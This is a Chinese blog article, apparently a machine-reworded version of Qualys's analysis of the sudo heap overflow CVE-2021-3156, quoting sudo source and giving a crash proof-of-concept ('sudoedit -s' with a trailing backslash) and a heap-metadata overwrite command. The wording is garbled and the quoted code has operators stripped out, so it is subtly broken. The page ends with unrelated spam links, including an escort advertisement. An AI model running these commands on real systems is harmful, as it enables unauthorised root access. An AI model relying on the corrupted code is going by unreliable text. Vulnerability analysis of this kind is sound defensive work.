CVE-2021-3156 Linux sudo漏洞剖析

访客4年前黑客文章499

Qualys科学研究工作人员发觉了Linux sudo的安全性漏洞。在类Unix 系统软件中, *** 攻击利用该漏洞能够让非权利客户在默认设置sudo 配备下获得root管理权限。

Sudo 是根据Unix和Linux的电脑操作系统中的程序流程,能够让网站管理员给予sudoers文档中的客户比较有限的root管理权限。该漏洞是2011年7月的commit 8255ed69中引入的,距今早已快十年了,危害1.8.2到1.8.31p2版本,及其默认设置配备的1.9.0 到1.9.5p1平稳版本中。

Qualys安全性科学研究工作人员单独认证了该漏洞,并开发设计出了Ubuntu 20.04 (Sudo 1.8.31)、Debian 10 (Sudo 1.8.27)和Fedora 33 (Sudo 1.9.2)版本的好几个漏洞利用。

假如Sudo以shell 方式实行来运行指令:

能够根据-s 选择项来设定Sudo的MODE_SHELL flag;或

根据-s 选择项来设定Sudo的MODE_SHELL 和 MODE_LOGIN_SHELL flag,随后在Sudo的 main()涵数逐渐时,用parse_args() 覆写 argv (609-617行),实际 *** 是联接全部的命令行参数(587-595行)和用反斜杠(backslash)来编号(escape)全部的元字符(590-591行):

--------------------------------------------------------------------

571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)){

572 char **av, *cmnd = NULL;

573 int ac = 1;

...

581 cmnd = dst = reallocarray(NULL, cmnd_size, 2);

...

587 for (av = argv; *av != NULL; av ){

588 for (src = *av; *src != ''; src ){

589

590 if (!isalnum((unsigned char)*src) && *src != '_' && *src != '-' && *src != '$')

591 *dst = '\\\\';

592 *dst = *src;

593 }

594 *dst = ' ';

595 }

...

600 ac = 2;

...

603 av = reallocarray(NULL, ac 1, sizeof(char *));

...

609 av[0]= (char *)user_details.shell;

610 if (cmnd != NULL){

611 av[1]= "-c";

612 av[2]= cmnd;

613 }

614 av[ac]= NULL;

615

616 argv = av;

617 argc = ac;

618 }

---------------------------------------------------------------------

随后,在sudoers_policy_main()中,set_cmnd()会联接全部的命令行参数到根据堆的缓存文件“user_args” (864-871行)中,编解码全部的元字符(866-867行):

--------------------------------------------------------------

819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)){

...

852 for (size = 0, av = NewArgv 1; *av; av )

853 size = strlen(*av) 1;

854 if (size == 0 || (user_args = malloc(size)) == NULL){

...

857 }

858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)){

...

864 for (to = user_args, av = NewArgv 1; (from = *av); av ){

865 while (*from){

866 if (from[0]== '\\\\' && !isspace((unsigned char)from[1]))

867 from ;

868 *to = *from ;

869 }

870 *to = ' ';

871 }

...

884 }

...

886 }

---------------------------------------------------------------------

可是,假如命令行参数是以反斜杠标识符末尾的,那麼:

在866行,“from[0]”是反斜杠标识符,“from[1]”是主要参数的空终止符;

在867行,“from”是增长的,并偏向了空终止符;

在868行,空终止符被拷贝到了“user_args”缓存文件,“from”是增长的,并偏向了空终止符后的之一个标识符;

865-869行的while 循环系统会载入和拷贝越境标识符到“user_args”缓存文件。

换句话说,因为被拷贝到“user_args”缓存文件的越境标识符并没有852-853行的size中,因而set_cmnd() 易遭受根据堆的缓存溢出漏洞进攻。

可是,理论上沒有命令行参数以单独反斜杠标识符完毕:假如在858行设定了MODE_SHELL或MODE_LOGIN_SHELL,也设定了MODE_SHELL(571行),那麼parse_args() 会编号全部的元字符,包含反斜杠。

实际上,set_cmnd()中有漏洞的编码和parse_args()中的编号编码是有不一样的标准的:

---------------------------------------------------------------------

819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)){

...

858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)){

---------------------------------------------------------------------

versus:

---------------------------------------------------------------------

571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)){

---------------------------------------------------------------------

难题的关键是是不是能够设定MODE_SHELL和MODE_EDIT 或 MODE_CHECK,而不是默认设置的MODE_RUN?

回答是No。假如设定了MODE_EDIT (-e opt ion)或MODE_CHECK (-l option),随后parse_args() 会从“valid_flags”清除MODE_SHELL,假如特定失效的flag便会由于不正确撤出:

---------------------------------------------------------------------

358 case 'e':

...

361 mode = MODE_EDIT;

362 sudo_settings[ARG_SUDOEDIT].value = "true";

363 valid_flags = MODE_NONINTERACTIVE;

364 break;

  ...

  416 case 'l':

  ...

  423 mode = MODE_LIST;

  424 valid_flags = MODE_NONINTERACTIVE|MODE_LONG_LIST;

  425 break;

  ...

  518 if (argc > 0 && mode == MODE_LIST)

  519 mode = MODE_CHECK;

  ...

  532 if ((flags & valid_flags) != flags)

  533 usage(1);

  ---------------------------------------------------------------------

  但是,研究人员发现一个循环漏洞:如果以“sudoedit” 而非 “sudo” 执行Sudo,parse_args()就会自动设置MODE_EDIT (270行),而不重新设置“valid_flags”, “valid_flags”默认是含有MODE_SHELL的(127和249行):

  ---------------------------------------------------------------------

  127 #define DEFAULT_VALID_FLAGS (MODE_BACKGROUND|MODE_PRESERVE_ENV|MODE_RESET_HOME|MODE_LOGIN_SHELL|MODE_NONINTERACTIVE|MODE_SHELL)

  ...

  249 int valid_flags = DEFAULT_VALID_FLAGS;

  ...

  267 proglen = strlen(progname);

  268 if (proglen > 4 && strcmp(progname + proglen - 4, "edit") == 0) {

  269 progname = "sudoedit";

  270 mode = MODE_EDIT;

  271 sudo_settings[ARG_SUDOEDIT].value = "true";

  272 }

  ------------------------------------------------------------------------

  因此,如果执行“sudoedit -s”,就可以设置MODE_EDIT 和 MODE_SHELL (而非 MODE_RUN),并通过以单反斜杠字符结尾的命令行参数来覆写基于堆的缓存“user_args”:

  ---------------------------------------------------------------------

  sudoedit -s '\' `perl -e 'print "A" x 65536'`

  malloc(): corrupted top size

  Aborted (core dumped)

  ---------------------------------------------------------------------

  从攻击者的角度来看,该缓存溢出漏洞是非常理想的,主要原因有:

  攻击者可以控制“user_args” 缓存的大小;

  攻击者可以独立控制溢出的大小和内容;

  攻击者可以将空字节写入覆写的缓存中。

  比如,在amd64 Linux系统中,以下命令会分配一个24字节的“user_args”缓存,然后用“A=aB=b” (0x00623d4200613d41) 覆写下一个chunk的size域,用“C=cD=d” (0x00643d4400633d43) 覆写fd域,用“E=eF=f” (0x00663d4600653d45) 覆写bk域:

  ---------------------------------------------------------------------

  env -i 'AA=a\' 'B=b\' 'C=c\' 'D=d\' 'E=e\' 'F=f' sudoedit -s '1234567890123456789012\'

  ---------------------------------------------------------------------

  --|--------+--------+--------+--------|--------+--------+--------+--------+--

  | | |12345678|90123456|789012.A|A=a.B=b.|C=c.D=d.|E=e.F=f.|

  --|--------+--------+--------+--------|--------+--------+--------+--------+--

  size size fd bk

  PoC视频参见:

  来源:

相关文章

黑客能查出聊天记录吗 黑客如何获取微信记录

不说废话,用discuz做站,一定要注意下面的一些事项,这些都是我平时遇到的问题,希望对大家有帮助: 1、搞清楚discuz系统版本、模块版本、主题版本的兼容性和编码的一致性 2、伪静态结构要注意...

学生喜欢家长顾虑学校警察故事2013粤语犯难 冰雪运动进校园仍须

  2022年北京冬奥会的脚步越来越近,冰雪运动也在国人的生活中日渐占据重要的位置。内蒙古自治区冰雪资源丰富,近年来当地越来越多的学校将冬季的体育课改成冰雪课,让孩子们享受冰雪运动的乐趣。但冰雪运动进...

这些美食文案,暖胃又暖心

这些美食文案,暖胃又暖心

人在异乡、胃在家园,你有多久没有吃到家园的早餐? 五一之后的第一天上班,请问有几多人和烧脑君一样,最后一个闹钟响完依然陶醉在睡梦中不能自拔,尔后溘然惊醒,急仓皇地赶去上班,气喘吁吁地打上卡趴在工位上...

北京密云伴游,约一次高端伴游多少钱李妍

北京密云伴游,约一次高端伴游多少钱【李妍】,上海是一座成功人士的聚集地,对商业模特的需求也是比较大的,今天明星商务分享模特访梦,年龄昆明 女 33,婚姻:未婚,学历:高中,气质:北京密云伴游,约一次高...

网站的SEO推广工作要如何展开

网站的SEO推广工作要如何展开

很多SEO人员认为,百度计算一个网站的权重,只是单单从文章数量和外链数量判断而已。 其实,所谓的权重,是由200多项因素综合计算后得到的。文章数量和外链数量或许只是这200多项中其中两项而已。 而...

宠物咖啡店这个项目怎么样?品牌实力让人蠢蠢欲动

宠物咖啡店这个项目怎么样?品牌实力让人蠢蠢欲动

在繁忙的下午,喝上一杯下午茶或一杯咖啡对付许多的上班族来说,长短常的放松的一件工作。所以就使得休闲饮品获得了很大的成长,个中就包罗宠物咖啡店加盟品牌,它是一个很不错的加盟品牌,不少的加盟投资者都选择加...